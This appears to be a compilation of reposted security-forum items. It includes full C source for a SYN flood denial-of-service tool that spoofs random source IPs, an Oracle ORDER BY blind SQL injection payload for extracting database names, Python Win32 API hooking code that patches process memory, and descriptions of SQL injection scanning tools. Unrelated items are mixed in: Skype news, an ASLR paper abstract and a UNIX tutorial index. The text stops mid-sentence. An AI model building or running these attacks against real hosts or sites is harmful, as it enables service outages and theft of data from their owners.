[GNU Linux C] SYN Flooder source Author: jakash3 (cred) C source code for Linux for sending multiple SYN flagged tcp/ip packets with spoofed source addresses to spawn half-open fake connections with tcp hosts. A form of DoS attack using ipv4 addressing that may still work against hosts without syn cookies enabled. Using raw tcp ipv4 sockets, it sends packets in the form of an IP header and an appended TCP header with no initial data. Checksum for IP header is calculated for the IP header only, while checksum for TCP header is calculated for the TCP pseudo-header concatenated with the actual TCP header and data. synflood.c #include "tcpip.h" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> #include <signal.h> #include <errno.h> ushort csum(short* data, int len); char* randip(char* dst); ushort rand16(); uint rand32(); int sd; void help() { printf("SYN flooder - by Jakash3\nArguments: IPV4_ADDR PORT\n"); exit(1); } void quit(int sig) { close(sd); exit(0); } int main(int argc, char** argv) { if (argc!=3) help(); /* Map CTRL-C to quit() */ struct sigaction sa; sa.sa_handler = &quit; sa.sa_flags = 0; sigemptyset(&sa.sa_mask); sigaction(SIGINT, &sa, 0); char rip[16]; char packet[4096]; struct iphdr ip; struct tcpph tph; struct tcphdr tcp; struct sockaddr_in sin; const int on = 1; memset(&packet, 0, 40); ip.ihl = 5; ip.ipv = 4; ip.tos = 0; ip.len = IPHDR_LEN + TCPHDR_LEN; ip.id = htons(rand16()); ip.ttl = 64; ip.proto = IPPROTO_TCP; ip.src = (uint)inet_addr(randip(rip)); ip.dst = (uint)inet_addr(argv[1]); ip.chksum = 0; ip.chksum = csum((short*)&ip, IPHDR_LEN); tcp.sport = htons((short)atoi(argv[2])); tcp.dport = htons((short)atoi(argv[2])); tcp.seq = htonl(rand32()); tcp.offset = sizeof(struct tcphdr) / 4; tcp.flgs = TCP_SYN; tcp.chksum = 0; tph.src = ip.src; tph.dst = ip.dst; tph.zero = 0; tph.proto = IPPROTO_TCP; tph.tcp_len = sizeof(struct tcphdr); memmove(packet, &tph, TCPPH_LEN); memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN); tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN); memmove(packet, &ip, IPHDR_LEN); memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN); sd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if (sd == -1) { printf("Failed to create socket. Error code: %d\n", errno); exit(1); } if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1) { printf("Failed to set socket options. Error code: %d\n", errno); exit(1); } sin.sin_family = AF_INET; sin.sin_port = htons(tcp.dport); memmove(&(sin.sin_addr), &(ip.dst), sizeof(struct in_addr)); while (1) { if (sendto(sd, packet, ip.len, 0, (struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) { printf("Failed to send SYN packet(s). Error code: %d\n", errno); exit(1); } else { printf("Sent SYN packet with spoofed ip: %s\n", rip); } ip.id = htons(rand16()); ip.src = (uint)inet_addr(randip(rip)); ip.chksum = 0; ip.chksum = csum((short*)&ip, IPHDR_LEN); tph.src = ip.src; tcp.seq = htonl(rand32()); tcp.chksum = 0; memmove(packet, &tph, TCPPH_LEN); memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN); tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN); memmove(packet, &ip, IPHDR_LEN); memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN); } } ushort csum(short* data, int len) { int sum = 0; for (; len > 1; len -= 2) sum += *data++; if (len == 1) sum += *(uchar*)data; while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16); return ~sum; } /* The best I can do for generating a random ipv4 address */ char* randip(char* dst) { dst[0] = 0; int i, j, k; srandom(time(0)); srand(random()); srandom(rand()); j = rand() + random(); for (i = 0, k = 0; k < 4; i += strlen(dst + i), k++, j += ((rand() + (int)dst) % i) ^ time(0)) { srand((int)dst + i + k); srand(j + dst[i+k] + (int)&i + rand()); j = rand() % 255; sprintf(dst + i, "%d.", j); } dst[i-1] = 0; return dst; } ushort rand16() { srandom(time(0)); srand(random()); srandom(rand()); return (random() + rand() + time(0)) % 65535; } uint rand32() { srandom(time(0)); srand(random()); srandom(rand()); return (random() + rand() & time(0)); } tcpip.h #include <unistd.h> #include <netinet/in.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netdb.h> typedef unsigned char uchar; typedef unsigned short ushort; typedef unsigned int uint; /* Internet Datagram Header */ #define IPHDR_LEN 20 struct iphdr { uchar ipv:4; /* Internet Protocol Version */ uchar ihl:4; /* Total length (in DWORDs) */ uchar tos; /* Type of Service */ ushort len; /* Total length */ ushort id; /* Identification number */ ushort frag; /* Fragment offset and flags */ uchar ttl; /* Time to live */ uchar proto; /* Protocol type */ ushort chksum; /* Checksum */ uint src; /* Source IP Address */ uint dst; /* Destination IP Address */ }; /* TCP Header */ #define TCPHDR_LEN 20 struct tcphdr { ushort sport; /* Source Port */ ushort dport; /* Destination Port */ uint seq; /* Sequence number */ uint ack; /* Acknowledgement number */ uchar reserved:4; uchar offset:4; /* Size of TCP Header in DWORDs */ uchar flgs; /* TCP Flags */ #define TCP_FIN 0x01 #define TCP_SYN 0x02 #define TCP_RST 0x04 #define TCP_PSH 0x08 #define TCP_ACK 0x10 #define TCP_URG 0x20 ushort win; /* Window. Size of data to accept */ ushort chksum; /* Checksum */ ushort urgp; /* idk */ }; /* TCP Psuedo-header */ #define TCPPH_LEN 12 struct tcpph { uint src; uint dst; uchar zero; uchar proto; ushort tcp_len; }; Sursa: LeetCoders

Exploiting SQL Injection in ORDER BY on Oracle/MySQL submitted by alla on 10 May, 2011 - 15:10 Consider the following piece of code: $sql = "SELECT something FROM some_table WHERE id=? ORDER BY $column_name"; The WHERE clause is parametrized, but the ORDER BY isn't. This happens often enough. Assuming that $column_name comes from user input, this code is vulnerable to SQL injection. The way to exploit such SQL injection on MySQL backend is described by Sumit Siddharth here and by Jacco van Tuijl here I couldn't find any clues for Oracle though, so now that I have figured it out, here is how. This is a blind SQL injection technique - we'll have to extract one bit of info per query, using the order in which the data is returned by the application. Let's assume that the vulnerable script is called as vulnerable.php?sortcolumn=id . In this case it returns the following data: foo bar baz We can try sorting by other columns and see if the data gets returned in different order. Say, if we try vulnerable.php?sortcolumn=something, we get back: bar baz foo Now all we need to do is to get the query to sort the data by different column depending on the value of a given expression. In Oracle the following syntax works: ORDER BY (case when ((boolean_expression)) then id else something end) If boolean_expression is true the result will be sorted by id, otherwise by something. So, the vulnerable script may be called like this: vulnerable.php?sortcolumn=(case+when+((ASCII(SUBSTR((select+table_name+from+all_tables+where+rownum%3d1),1))>%3D128))+then+id+else+something+end) This will extract the most significant bit of the first character of the first row returned by "select table_name from all_tables" query. Actually fetching significant amounts of data obviously requires automation. MySQL: http://www.notsosecure.com/folder2/2008/08/01/injection-in-order-by-clause/ http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/ Sursa: http://www.gremwell.com/exploiting_sql_injection_in_order_by_on_oracle

Microsoft confirms purchase of Skype for $8.5 billion Tom Warren 2 hours ago Microsoft announced on Tuesday the acquisition of Skype. The software giant announced the deal on Tuesday, valued at $8.5 billion cash. Both Skype and Microsoft’s board of directors have approved the deal and Microsoft will create a new business division especially for Skype. Skype CEO Tony Bates will assume the title of president of the Microsoft Skype Division, reporting directly to Ballmer. “Skype is a phenomenal service that is loved by millions of people around the world,” said Microsoft CEO Steve Ballmer. “Together we will create the future of real-time communications so people can easily stay connected to family, friends, clients and colleagues anywhere in the world.” Microsoft says Skype will support Microsoft devices like Xbox and Kinect, Windows Phone and a wide array of Windows devices, and Microsoft will connect Skype users with Lync, Outlook, Xbox Live and other communities. Microsoft will continue to invest in and support Skype clients on non-Microsoft platforms. “Tony Bates has a great track record as a leader and will strengthen the Microsoft management team. I’m looking forward to Skype’s talented global workforce bringing its insights, ideas and experience to Microsoft,” Ballmer said. Skype currently has 170 million connected users and saw over 207 billion minutes of voice and video conversations in 2010 alone. Microsoft’s promise for Windows Phone, Xbox and Kinect Skype integration confirms that the company will look to use Skype broadly across its products. Skype was originally founded in 2003 and acquired by eBay in September 2005. An investment group led by Silver Lake acquired Skype in 2009. Speaking on behalf of the investor group that sold Skype to Microsoft, Egon Durban, managing director of Silver Lake, said: “We are thrilled with Skype’s transformation during the period of our ownership and grateful for the extraordinary commitment of its management team and employees. We are excited about Skype’s long-term future with Microsoft, as it is poised to become one of the world’s most dynamic and comprehensive communications platforms.” Sursa: Microsoft confirms purchase of Skype for $8.5 billion | WinRumors

API Hooking in Python Author: cadaver (cred) # patcher.py # handles patching and unpatching of process memory. # public domain code. from ctypes import * from win32api import * from pytcc import pytcc from struct import pack, unpack, calcsize from win32gui import PyGetString, PySetMemory, PySetString from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS from distorm import Decode DEBUG = True def DB (msg): global DEBUG if DEBUG: print (msg) def OpenProcess (pid=GetCurrentProcessId()): """Opens a process by pid.""" DB ("[openProcess] pid:%s."%pid) phandle = windll.kernel32.OpenProcess (\ PROCESS_ALL_ACCESS, False, pid ) assert phandle, "Failed to open process!\n%s" % WinError (GetLastError ()) [1] return phandle def readMemory (phandle, address, size): """readMemory (address, size, phandle):""" cbuffer = c_buffer (size) success = windll.kernel32.ReadProcessMemory (\ phandle, address, cbuffer, size, 0 ) assert success, "Failed to read memory!\n%s" % WinError (GetLastError()) [1] return cbuffer.raw def writeMemory (phandle, address=None, data=None): """Writes data to memory and returns the address.""" assert data size = len (data) if isinstance (data, str) else sizeof (data) cdata = c_buffer (data) if isinstance (data, str) else byref (data) if not address: address = allocate (size, phandle) success = windll.kernel32.WriteProcessMemory (\ phandle, address, cdata, size, 0 ) assert success, "Failed to write process memory!\n%s" % WinError (GetLastError()) [1] DB ("[write memory] :%s OK." % address) return address def allocate (size, phandle): """Allocates memory of size in phandle.""" address = windll.kernel32.VirtualAllocEx (\ phandle, 0, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) assert address, "Failed to allocate memory!\n%s" % WinError(GetLastError()) [1] DB ("[memory allocation] :%s" % address) return address def releaseMemory (address, size, phandle): """Releases memory by address.""" return windll.kernel32.VirtualFreeEx (\ phandle, address, size, MEM_RELEASE ) assert success, "Failed to read process memory!\n%s" % WinError(GetLastError()) [1] return cbuffer.raw def transport (data, phandle): size = len (data) memory = allocate (size, phandle) writeMemory (phandle, memory, data) return memory def get_patch (destination, params_size=0): """mov eax, destination call eax retn params_size """ if isinstance (destination, (int,long)): destination = pack ("i", destination) if isinstance (params_size, (int,long)): params_size = pack ("h", params_size) return '\xb8%s\xff\xd0\xc2%s' % (destination, params_size) def get_cparams_size (cparams): if not cparams: return 0 s = '' for param in cparams: s += "size += sizeof (%s);\n" % param c_code = """ int getsize () { int size = 0; %s return size; }""" % s #DB (c_code) ccompiler = pytcc () ccompiler.compile (c_code) ccompiler.relocate () getsize = ccompiler.get_function ("getsize") size = getsize () # ccompiler.delete () return size def get_cparams_size_b (cparams): return sum (map (calcsize, [param._type_ for param in cparams])) def find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000): """find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000): Searches the instructions inside an API for a good place to patch.""" # DEBUG if DEBUG == 2: bytes = PyGetString (apiaddress, needed_size * 2) dprint (apiaddress, bytes) # # # # aoffset = 0 found_space = 0 position = apiaddress while found_space < needed_size: bytes = PyGetString (position, 24) # DB ("found_space: %s. aoffset: %s. apiaddress: %s." % (found_space, aoffset, hex(position))) # if does_code_end_function (bytes): raise "Function end found before enough space was found!" offset, size, instruction, hexstr = Decode (position, bytes) [0] if "ret" in instruction.lower (): raise "Function end found before enough space was found!" if not filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]): found_space += size else: found_space = 0 aoffset += size if aoffset >= maxscan: raise "Maxscan exceeded while searching for a good spot to patch!" position += size return apiaddress + (aoffset - found_space) class patcher: source = None destination = None jmp_asm = None original_bytes = None params_size = 0 pid = None phandle = None duplicate_api = None original_api = None def __init__ (self, source=None, destination=None, params_size=0, pid=GetCurrentProcessId () ): self.set_pid (pid) self.set_source (source) self.set_destination (destination) self.set_params_size (params_size) def set_pid (self, pid): self.close () self.phandle = OpenProcess (pid) self.pid = pid def set_source (self, source): self.source = source def set_destination (self, destination): self.destination = destination def set_params_size (self, size): self.params_size = size def set_source_as_api (self, apiname, dllname="kernel32.dll", free=True): module = LoadLibrary (dllname) procedure = GetProcAddress (module, apiname) if free: FreeLibrary (module) assert procedure self.original_api = eval ("windll.%s.%s" % (dllname.strip(".dll"), apiname)) self.source = find_good_spot_to_patch (procedure, len (get_patch (0, self.params_size))) if DEBUG: DB ("found good spot to patch: %s %s. Offset from original api address: %s." \ %(self.source, hex (self.source), self.source - procedure)) def patch (self): assert all ((self.phandle, self.source, self.destination)), "Patch source or destination not set!" assert not self.original_bytes, "Already patched!" self.jmp_asm = get_patch (self.destination, self.params_size) jmp_asm_size = len (self.jmp_asm) self.original_bytes = PyGetString (self.source, jmp_asm_size) assert self.original_bytes, "Failed to capture original_bytes." writeMemory (\ phandle=self.phandle, address=self.source, data=self.jmp_asm) msg = "[jmp_asm]:%s\n[jmp_asm_size]:%s\n[original_bytes]:%s\n" \ % (repr (self.jmp_asm), jmp_asm_size, repr (self.original_bytes)) DB (msg) def unpatch (self): if not self.original_bytes: raise "Not patched!" assert all ((self.phandle, self.source, self.destination)), "Not initialized!" writeMemory (\ phandle=self.phandle, address=self.source, data=self.original_bytes ) self.original_bytes = None def close (self): if self.phandle: windll.kernel32.CloseHandle (self.phandle) self.phandle = None def release (self): if self.phandle and self.duplicate_api: releaseMemory (self.duplicate_api, 0, self.phandle) def call_original_api (self, *args, **kwargs): return self.original_api (*args, **kwargs) def call_duplicate_api (self, types, *args, **kwargs): return WINFUNCTYPE (c_void_p, types) (self.duplicate_api) (*args, **kwargs) def __del__ (self): try:self.unpatch () except:pass try:self.release () except:pass try:self.close () except:pass def dprint (a, c): """Pretty prints disassembled bytes. dprint (offset, bytes).""" x = Decode (a, c) print "[deci addr : hexi addr] [size] instruction\n" for offset, size, instruction, hexstr in x: print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction) a += size print #cad # tramper.py # Relocates bytes of an API and creates a jump from those bytes to the original API affectively negating a hook. # TODO !Recalculate Relocated Relative jmp and call addresses. # public domain code. from ctypes import * from win32api import * from pytcc import pytcc from struct import pack, unpack from win32gui import PyGetString, PySetMemory, PySetString from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS from distorm import Decode from patcher import OpenProcess, readMemory, writeMemory, allocate, transport DEBUG = True def DB (msg): global DEBUG if DEBUG: print (msg) def tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"): """tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"): Creates a duplicate API using the trampoline method and returns its address. """ if DEBUG: global hprocess, landing_offset, instructions, landing_address, tramp_memory, tramp_code, original_bytes if not apiaddress: dll = LoadLibrary (dllname) apiaddress = GetProcAddress (dll, apiname) landing_offset = 0 hprocess = OpenProcess () original_bytes = PyGetString (apiaddress, 300) tramp_memory = allocate (len (original_bytes) + 50, hprocess) print "Tramp memory: %s %s." % (tramp_memory, hex (tramp_memory)) instructions = Decode (apiaddress, original_bytes) sizes = iter ([X[1] for X in instructions]) while landing_offset < hook_size: landing_offset += sizes.next () landing_address = apiaddress + landing_offset DB ("Landing offset : %s %s" % (landing_offset, hex (landing_offset))) DB ("Landing address: %s %s" % (landing_address, hex (landing_address))) distance = landing_address - (tramp_memory +landing_offset) DB ("Distance: %s %s." % (distance, hex (distance))) tramp_code = original_bytes [:landing_offset] # api start - past hook - to start of instruction instructions = Decode (apiaddress, tramp_code) boffset = 0 for offset, size, instruction, hexstr in instructions: if filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]): raise "[not supported yet] Cannot relocate CALL/JMP Instructions. Address: %s"% (apiaddress + boffset) boffset += size # # TODO !Recalculate Relocated Relative jmp and call addresses. # jump_code = '\xe9' + pack ("i", distance - 5) # bytes = jmp (distance - size of jump) tramp_code += jump_code # DEBUG DB ("Tramp [size]: %s [bytes]; %s" % (len(tramp_code), (repr(tramp_code)))) DB ("Tramper api decode.") if DEBUG: dprint (apiaddress, tramp_code) # # # # writeMemory (hprocess, tramp_memory, tramp_code) CloseHandle (hprocess) return tramp_memory def dprint (a, c): """ pretty print disassembled bytes. dprint (offset, bytes).""" x = Decode (a, c) print "[deci addr : hexi addr] [size] instruction\n" for offset, size, instruction, hexstr in x: print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction) a += size if __name__ == "__main__": # Test. lib = LoadLibrary ("kernel32") OpenProcessAddr = GetProcAddress (lib, "OpenProcess") FreeLibrary (lib) trampAddr = tramper (\ apiaddress=OpenProcessAddr, # (optional if apiname is defined) API address to duplicate. hook_size=10, # size of our API jmp code. (minimum size of relocated API bytes) apiname=None, # (optional) dllname="kernel32") # (optional / defaults to kernel32) # Prototype the OpenProcess trampoline. duplicate_OpenProcess = WINFUNCTYPE (c_int, c_int, c_int, c_int) (trampAddr) pid = GetCurrentProcessId () print "Calling duplicate OpenProcess with pid: %s" % pid phandle = duplicate_OpenProcess (0x1f0fff, 0, pid) print "Return value: %s." %phandle if phandle: CloseHandle (phandle) #cad # hooker.py # deals with hooking of win32 APIs. # public domain code. from patcher import * from tramper import tramper from win32api import * from pytcc import pytcc def create_hook (duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"): """ create_hook (pat, duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"): """ c_code =\ """ %s function (int caller, %s) { %s %s RET = DUPE ( %s ); %s return RET; }""" cargs = '' symbols = '' for arg, char in zip (cparam_types, "ABCDEFGHIJKLMNOPQRSTUVWXYZ"): symbols += "%s, " % char cargs += "%s %s, " % (arg, char) symbols = symbols [:-2] cargs = cargs [:-2] c_code = c_code % (restype, cargs, prelogic, restype, symbols, postlogic) ccompiler = pytcc () ccompiler.add_lib_proc ("msvcrt.dll", "memset") ccompiler.add_symbol ("DUPE", duplicate_api) ccompiler.compile (c_code) ccompiler.relocate () hook = ccompiler.get_symbol ("function") return (c_code, hook) def hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"): """hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"): """ pat = patcher () params_size = get_cparams_size (cparam_types) pat.set_params_size (params_size) pat.set_source_as_api (apiname, dllname) hook_size = len (get_patch (pat.destination, pat.params_size)) tramp = tramper (pat.source, hook_size) pat.duplicate_api = tramp hook_ccode, hooks = create_hook (tramp, cparam_types, prelogic, postlogic, restype) pat.c_code = hook_ccode pat.set_destination (hooks) return pat if __name__ == '__main__': # Test. hook = hooker (\ # API to hook apiname="OpenProcess", # the DLL the API is in. (defaults to kernel32) dllname="kernel32", # (required) API parameter types. In our hook these get translated to the names A,B,C...respectively. cparam_types=["int", "int", "int"], # (required) the API return type. restype="int", # (optional) this is the code in our hook wich is executed Before the real API. prelogic="if (C==1) {return 1111;}", # (optional) this is the code in our hook wich is executed After the real API. The real API's return value is named RET. postlogic="if (RET) {return 0;}" ) # hook API. # hook automatically unhooks itself and cleans up when it isnt refered to anymore. hook.patch () print "Calling hooked OpenProcess api with process id as 1." ret = windll.kernel32.OpenProcess (0x1f0fff, 0, 1) print "Return value: %s" % ret if ret == 1111: print "This test was sucesful." else: print "Return value is unexpected." # unhook API. # hook.unpatch () #cad Download: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3110 Sursa: API Hooking in Python - rohitab.com - Forums

Nu, continea SQLite, deci 99% era un Stealer, care printre altele era si pentru Firefox. Nu m-am chinuit sa analizez fisierul, am vazut aia, am dat ban.

Address Space Randomization for Mobile Devices Hristo Bojinov Stanford University Dan Boneh Stanford University Rich Cannings Google, Inc. Iliyan Malchev Google, Inc. ABSTRACT Address Space Layout Randomization (ASLR) is a defen- sive technique supported by many desktop and server oper- ating systems. While smartphone vendors wish to make it available on their platforms, there are technical challenges in implementing ASLR on these devices. Pre-linking, lim- ited processing power and restrictive update processes make it difficult to use existing ASLR implementation strategies even on the latest generation of smartphones. In this paper we introduce retouching, a mechanism for executable ASLR that requires no kernel modications and is suitable for mo- bile devices. We have implemented ASLR for the Android operating system and evaluated its eectiveness and per- formance. In addition, we introduce crash stack analysis, a technique that uses crash reports locally on the device, or in aggregate in the cloud to reliably detect attempts to brute-force ASLR protection. We expect that retouching and crash stack analysis will become standard techniques in mobile ASLR implementations. Download: http://bojinov.org/professional/wisec2011-mobileaslr-paper.pdf

UNIX Tutorial for Beginners These tutorials are derived from the excellent tutorials from the University of Surrey, UK, with some minor modifications for our site. The originals can be found here. Typographical Conventions Introduction to The UNIX operating system Tutorial One Listing files and directories Making Directories Changing to a different Directory The directories . and .. Pathnames More about home directories and pathnames Tutorial Two Copying Files Moving Files Removing Files and directories Displaying the contents of a file on the screen Searching the contents of a file Tutorial Three Redirection Redirecting the Output Redirecting the Input Pipes Tutorial Four Wildcards Filename Conventions Getting Help Tutorial Five File system security (access rights) Changing access rights Processes and Jobs Listing suspended and background processes Killing a process Tutorial Six Other Useful UNIX commands Tutorial Seven Compiling UNIX software packages Download source code Extracting source code Configuring and creating the Makefile Building the package Running the software Stripping unnecessary code Tutorial Eight UNIX variables Environment variables Shell variables Using and setting variables UNIX Frequently Asked Questions (FAQs) These seven articles contain the answers to some Frequently Asked Questions often seen in comp.unix.questions and comp.unix.shell. History of UNIX UNIX was originally developed at Bell Laboratories as a private research project by a small group of people. Read all about the history of its creation. This tutorial is licensed under a Creative Commons License. The original version was prepared and is copyrighted by Michael Stonebank of the University of Surrey, UK. Online: http://manuals.itc.virginia.edu/unixtut/index.html

SQID SQL Injection Digger About SQL injection digger is a command line program that looks for SQL injections and common errors in web sites. Current version can perform the following operations: Look for SQL injections and common errors in web site URLs found by performing a google search. Look for SQL injections and common errors in a given URL or a file with URLs. Look for SQL injections and common errors in links from a web page. Crawl a web site/web page and do the above. Also supports Load multiple triggers from file. Load multiple signature databases from files. HTTPS support. HTTP proxy support with authentication. Basic authentication. Specify user agent. Specify referer. HTTP Cookies loading from command line or a file. sqid is written in ruby.Find out more about SQL Injection. sqid is extensible by adding more signatures to its database (sqid.db). The signatures simply use regular expressions. Usage Usage: sqid.rb [options] options: -m, --mode MODE Operate in mode MODE. MODE is one of g,google Operate in google search mode. u,url Check this url or a file with urls. p,page Check single page. c,crawl Crawl website and check. Google search mode options: -q, --query QUERY QUERY to perforn google search for. -s, --start START zero-based index of the first desired result, zero if not specified. -r, --results RESULTS number of results desired, default is 20 if not specfied. rounded to tens. URL check mode options: -u, --url URL check this URL. If URL is a file urls will be loaded from this file, specify each url on a new line. Page check mode options: -p, --page PAGE Check this page. Crawl mode options: -c, --crawl WEBSITE Crawl website WEBSITE and check. specfify as http[s]://WESITE:[PORT], default PORT is 80 URL, Page and Crawl mode common options: -C, --cookie COOKIE Cookie in the HTTP header specify as name=value,name=value. If COOKIE is a file cookies will be loaded from this file, specify each cookie on a new line. -a, --accept-cookies Accept cookies from the webite or page. Default is no. -R, --referer REFERER Set referer in the HTTP header. -B, --auth CREDENTIALS Use crendtials as basic auth for the website. specfify as user:password. Common options: -o, --with-noquery Match page content without query parameters. Default is false. -D, --db-files FILE,...,FILE Use file(s) FILE,...,FILE as signature database. -t, --trigger TRIGGER Use TRIGGER for detecting SQL injections/errors default is '. If TRIGGER is a file triggers will be loaded from it. specify each trigger on newline. Lines starting with a # are ignored. -T, --time-out TIMEOUT Timeout for response in seconds. Default is 10 seconds. -U, --user-agent USERAGENT User Agent in the HTTP Header. -P, --proxy PROXY User HTTP proxy PROXY for operations. specfify as proxy:port. -A, --proxy-auth CREDENTIALS Use crendtials CRENDENTIALS for the proxy. specfify as user:password. -v, --verbose Run verbosely. -h, --help Show this message Download: http://rubyforge.org/frs/?group_id=2617

SQL Power injector Introduction SQL Power Injector is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page. For now it is SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant, but it is possible to use it with any existing DBMS when using the inline injection (Normal mode). Indeed, the normal mode is basically the SQL command that someone will put in the parameter sent to the server. If the aspect of inline SQL injection is powerful in itself, its main strength dwells in the multithreaded automation of the injection. Not only there is a possibility to automate tedious and time consuming queries but you can also modify the query to get only what you want. It is obviously more useful in the blind SQL injection since the other ways to exploit the SQL injection vulnerability is more effusive and much faster when the results are displayed on the web page (union select in a HTML table and generated 500 error for instance). The automation can be realized in two ways: comparing the expected result or by time delay. The first way is generally compared against an error or difference between positive condition with a negative one and the second way will turn out positive if the time delay sent to the server equals to the one parameterized in the application. The main effort done on this application was to make it as painless as possible to find and exploit a SQL injection vulnerability without using any browser. That is why you will notice that there is an integrated browser that will display the results of the injection parameterized in a way that any related standards SQL error will be displayed without the rest of the page. Of course, like many other features of this application, there are ways to parameterize the response of the server to make it as talkative to you as possible. Another important part of this application is its power to get all the parameters from the web page you need to test the SQL injection, either by GET or POST method. Like this someone won't need to use several applications or a proxy to intercept the data, all is automated! Not only that, but now there is a Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies). I worked hard on the application usability but I am aware that at first use it's not too obvious. I'm pretty confident that once the few things you need to comprehend are understood it will be quite easy to use afterwards. In order to help a beginner to understand its basic features I created a tutorial that not only will help him out but can also be educative for some advanced SQL injection techniques. Moreover, You will find some great tricks in the FAQ as well and now with the version 1.2 a help file (chm) containing a list of the most useful information for SQL injection. Also, I designed this application the way I was making my own pen testing and how I was using SQL injection. It has been tested successfully many times on real life web sites (legally of course) and as soon as I see something missing I'm adding it. Now of course that it's officially available to the security community I will have to have more rigors and wait to add them in a new version of the software. This process has already started and many more features will come with time. Finally, this application will be free of charge and hopefully be used to help in security assessments made by security professionals or to further the knowledge of the techniques used. Obviously I will not be held responsible of any misuses or damage caused by this application. What It's Not This application if powerful won't find SQL injection vulnerabilities for you nor will find the right syntax if one found. Its main strength is to provide a way to find them more easily and once they are found to automate it in a way that you won't need to make every single injection if the only way to inject is using the blind technique. Moreover, I didn't intent to make it to be a database pumping application. There are plenty good applications for that purpose. In any cases many pumped data are not relevant and since it takes time to pump it can be a real waste of time. It's better to refine and get what you really want. Lastly, if I added the feature (mini-browser) to have the results in an HTML format it doesn't mean that it has all the features of a professional browser. Internet Explorer and Mozilla, to mention a few, are real complex software that it would be nearly impossible to implement all their features in my application. That's why that you won't be able to use it as a conventional browser even though it has the same look and feel. Features Supported on Windows, Unix and Linux operating systems SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant SSL support Load automatically the parameters from a form or a IFrame on a web page (GET or POST) Detect and browse the framesets Option that auto detects the language of the web site Detect and add cookies used during the Load Page process (Set-Cookie detection) Find automatically the submit page(s) with its method (GET or POST) displayed in a different color Can create/modify/delete loaded string and cookies parameters directly in the Datagrids Single SQL injection Blind SQL injection Comparison of true and false response of the page or results in the cookie Time delay Response of the SQL injection in a customized browser Can view the HTML code source of the returned page in HTML contextual colors and search in it Fine tuning parameters and cookies injection Can parameterize the size of the length and count of the expected result to optimize the time taken by the application to execute the SQL injection Create/edit ASCII characters preset in order to optimize the blind SQL injection number of requests/speed Multithreading (configurable up to 50) Option to replace space by empty comments /**/ against IDS or filter detection Automatically encode special characters before sending them Automatically detect predefined SQL errors in the response page Automatically detect a predefined word or sentence in the response page Real time result Save and load sessions in a XML file Feature that automatically finds the differences between the response page of a positive answer with a negative one Can create a range list that will replace the variable (<<@>>) inside a blind SQL injection string and automatically play them for you Automatic replaying a variable range with a predefined list from a text file Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies) Two integrated tools: Hex and Char encoder and MS SQL @options interpreter Can edit the Referer Can choose a User-Agent (or even create one in the User-Agent XML file) Can configure the application with the settings window Support configurable proxies Differences with Other Tools To be honest, I didn't study all the other tools features in all their details. The only thing I can say is that if they are great they always lack something important that I need when I'm doing SQL injection. Some application will find the SQL injection for you that sometimes will result in false positive. And others will generically pump the data of the database. Some of those applications got smarter and you can check for what you need when the list of databases has been pumped. Or ask a specific hard coded data, such as the current DB user. But none of them have the ability to specifically choose what you want as far as I know. That ability comes with a cost of course, you need to know some SQL syntax, but I can assure that once someone understands how it works, not much syntax is required. Also, I cannot recall to have seen any application using the time delay feature inserted in the application. Many SQL injection vulnerabilities are impossible to exploit unless you use that technique. A technique that could be really tedious and time consuming, that often results by giving up after long hours of copy pasting the command in the browser when done manually. I don't remember as well to have seen any multithread feature that can be most definitely a really important time saver. Nor the ASCII characters preset feature that can save up to 25% the blind SQL injection. (Please look at the statistics section for some figures) I apologize in advance to those who have made their own application and made it available on the Net that possess those features before I made SQL Power Injector available. Please let me know and I will update this section. Summary of the differences: Web page string and cookie parameters auto detection Fine tuning parameters SQL injection Time delay feature Multithread feature Response results in a customized browser Automated positive and negative condition discovery Blind SQL injection characters preset optimizer Screenshots You will find two screen shots demonstrating the two techniques used in the application: Normal and Blind. Screen 1: SQL Power injector with Normal technique Screen 2: SQL Power injector with Blind technique Some Statistic Figures I didn't use any scientific methods so do not consider those statistics as scientific facts but more as a general idea of what you can expect. Especially that no one controls the flux on the Net and I would be really hard pressed to give any valuable scientific data. Another thing, I didn't make enough tests (10 times for each thread) to have a real statistical sample since the goal of these numbers will be to show approximately what you can expect. Moreover, it will depend also of the size of the data sought. Sometimes a lower number of threads will be more effective than more. In fact, the time taken will be optimized if the length of the value is a divisible number of the number of thread. So let's say we have 24 characters length, 3, 4, 6 and 8 will be faster than any other. As a rule of thumb, the bigger gap of time between any thread is from 1 to 2. As you can see the higher is not 